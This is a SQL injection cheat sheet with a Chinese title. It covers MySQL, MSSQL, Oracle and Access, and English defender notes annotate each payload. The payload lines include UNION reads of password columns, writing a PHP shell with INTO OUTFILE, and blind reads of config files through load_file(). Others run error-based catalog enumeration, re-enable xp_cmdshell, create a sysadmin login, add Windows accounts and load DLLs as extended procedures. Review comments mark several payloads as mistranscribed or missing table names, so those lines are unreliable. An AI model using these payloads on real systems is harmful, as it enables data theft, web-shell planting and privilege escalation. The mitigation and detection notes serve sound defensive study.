各种数据库注入常识
MySQL注入常用语句/函数-------------/*!30000 s
-- Defender notes (MySQL). Every line below is a fragment that only works when
-- the application concatenates request input into its SQL text; bound
-- parameters (prepared statements) remove the injection point for all of them.
--
-- UNION-based read: adds a row that returns manager.password in the fifth
-- column of a six-column result set. Seeing "union select" followed by a run
-- of integers in a request parameter is a strong detection signal.
union select 1,2,3,4,password,6 from manager
-- Writes the query result to a file on the database host; here the target is a
-- .php path under a web directory. It needs the FILE privilege and is limited
-- by secure_file_priv, so: do not grant FILE to the application account, set
-- secure_file_priv to a dedicated directory (or NULL), and keep the web root
-- unwritable by the mysqld OS user.
into outfile '/home/web1/shell.php'
-- Boolean test on the contents of a server-side file read with load_file()
-- (also gated by FILE and secure_file_priv).
-- NOTE(review): as written instr() receives a single argument, so this line
-- looks mistranscribed.
instr(substring(load_file('/home/web1/config.php'),'password'))>0
-- Blind read: compares the code of the first byte of the file with 112, so a
-- true/false difference in the response leaks the file one comparison at a time.
ord(substring(load_file('/home/web1/config.php'),1,1))>112
-- Same test with the path given as a hex literal (it decodes to
-- /home/web1/config.php). No quote characters are needed, so quote escaping or
-- quote blocklists are not a defence; detection rules should decode 0x literals.
ord(substring(load_file(0x2F686F6D652F776562312F636F6E6669672E706870),1,1))>112
MSSQL注入常用语句/函数-------------
-- Defender notes (SQL Server, enumeration). The "And (...)>0" fragments are
-- error-based: a varchar is compared with an integer, and the conversion error
-- text carries the value. Mitigations: parameterized queries, generic error
-- pages (never return database error text to the client), and an application
-- login with no access to system catalogs beyond what it needs.
--
-- Checks whether the extended procedure xp_cmdshell is registered
-- (xtype 'X' = extended stored procedure).
select count(*) FROM master..sysobjects where xtype = 'X' AND name = 'xp_cmdshell'
-- Original note: obtains table names one at a time. char(85) is 'U', i.e. user tables.
And (Select Top 1 cast(name as varchar(8000)) from(Select Top 1 id,name from sysobjects Where xtype=char(85) order by id) T order by id desc)>0 //依次得到表名
-- Original note: obtains column names. The NCHAR() sequence spells the table
-- name News_User without using quote characters.
And (Select Top 1 cast(name as varchar(8000)) from (Select Top 1 colid,name From syscolumns Where id = OBJECT_ID(NCHAR(78)+NCHAR(101)+NCHAR(119)+NCHAR(115)+NCHAR(95)+NCHAR(85)+NCHAR(115)+NCHAR(101)+NCHAR(114)) Order by colid) T Order by colid desc)>0 //得到列名
-- Original note: obtains the number of records. char(97) ('a') is appended so
-- the count cannot convert to an integer.
-- NOTE(review): the table name after "From" appears to have been dropped from the page.
And (Select Cast(Count(1) as varchar(8000))+char(97) From Where 1=1)>0 //得到字段的记录个数
-- Original note: obtains the value of a field. char(32) is a space and
-- char(124) is '|'.
-- NOTE(review): the column name inside cast() and the table name after "From"
-- appear to have been dropped from the page.
And (Select Top 1 isNull(cast( as varchar(8000)),char(32))+char(124) From (Select Top 1 sName From Where 1=1 Order by sName) T Order by sName desc)>0 //得到字段的值
-- Tests whether the current login is in the sysadmin server role. A web
-- application login should never be; everything in the procedure-abuse list
-- that follows depends on that level of privilege.
select IS_SRVROLEMEMBER('sysadmin')
-- Returns the current database user name.
select user_name()
-- Defender notes (SQL Server, procedure abuse). All of these need a highly
-- privileged login. Run the application under a low-privilege login, keep
-- xp_cmdshell disabled (it is off by default and controlled through
-- sp_configure on SQL Server 2005 and later), and run the SQL Server service
-- under a low-privilege OS account.
--
-- Re-registers xp_cmdshell from its DLL after it has been dropped; this form
-- applies to old releases where dropping the procedure was the hardening step.
EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'
-- Creates SQL login "test" with password "test", adds it to sysadmin, then
-- changes its password to 123456. Detect with SQL Server Audit on login
-- creation and server role membership changes
-- (e.g. SERVER_ROLE_MEMBER_CHANGE_GROUP) and alert on any new sysadmin member.
exec master.dbo.sp_addlogin test,test
exec master.dbo.sp_addsrvrolemember test,sysadmin
exec master.dbo.sp_password test,123456,test
-- Runs an OS command that adds a local Windows account whose name resembles
-- the built-in IIS accounts. Detect via Windows Security event 4720 (account
-- created) and via sqlservr.exe spawning cmd.exe or net.exe.
exec master.dbo.xp_cmdshell 'net user IWAM-IUSR /add'
-- Stores the output of a directory listing in table "temp" so it can be read
-- back through the injection point; the next two lines do the same with
-- xp_subdirs and xp_dirtree. Unexpected tables created by the application
-- login are a useful indicator.
insert into temp(s1) exec master.dbo.xp_cmdshell 'dir d:\web\*.asp /s/a'
insert into temp(s1) exec master.dbo.xp_subdirs 'd:\'
insert into temp(s1,s2) exec master.dbo.xp_dirtree 'd:\'
-- Registers an extended procedure backed by a DLL under c:\temp, which loads
-- that DLL into the SQL Server process. Monitor for new extended procedures and
-- for DLLs loaded from user-writable paths.
sp_addextendedproc 'xp_webserver', 'c:\temp\xp_foo.dll'
-- Reference value: the character code of 'a' is 97.
ascii('a')=97
Oracle注入常用语句/函数------------
-- Defender notes (Oracle). Boolean probes appended to a WHERE clause: each is
-- true when the data-dictionary view is readable and non-empty, so the page
-- renders normally. Use bind variables, and connect the application as a
-- schema that holds only the object privileges it needs.
0<>(select count(*) from all_tables) and 1=1
0<>(select count(*) from user_tables) and 1=1
0<>(select count(*) from user_tab_columns) and 1=1
-- The chr() sequence spells %PASS% without quote characters, so the probe asks
-- whether any column name contains PASS. Quote filtering does not stop this;
-- detection rules should treat long chr()||chr() chains in request parameters
-- as suspicious.
0<>(select count(*) from user_tab_columns where column_name like chr(37)||chr(80)||chr(65)||chr(83)||chr(83)||chr(37)) and 1=1
-- Reference list of string helpers used in such probes: chr() concatenation,
-- ascii, length, substr.
chr(97)||chr(98) ascii length substr
Access注入常用语句/函数-------------
-- Defender notes (Access / Jet). Boolean blind test: true when the character
-- code of the first character of admin.username is greater than 97 ('a'), so
-- repeated requests that differ only in the compared number are the pattern to
-- look for in web logs. Use parameterized commands instead of string-built SQL.
exists(select * from admin where asc(mid(username,1,1))>97)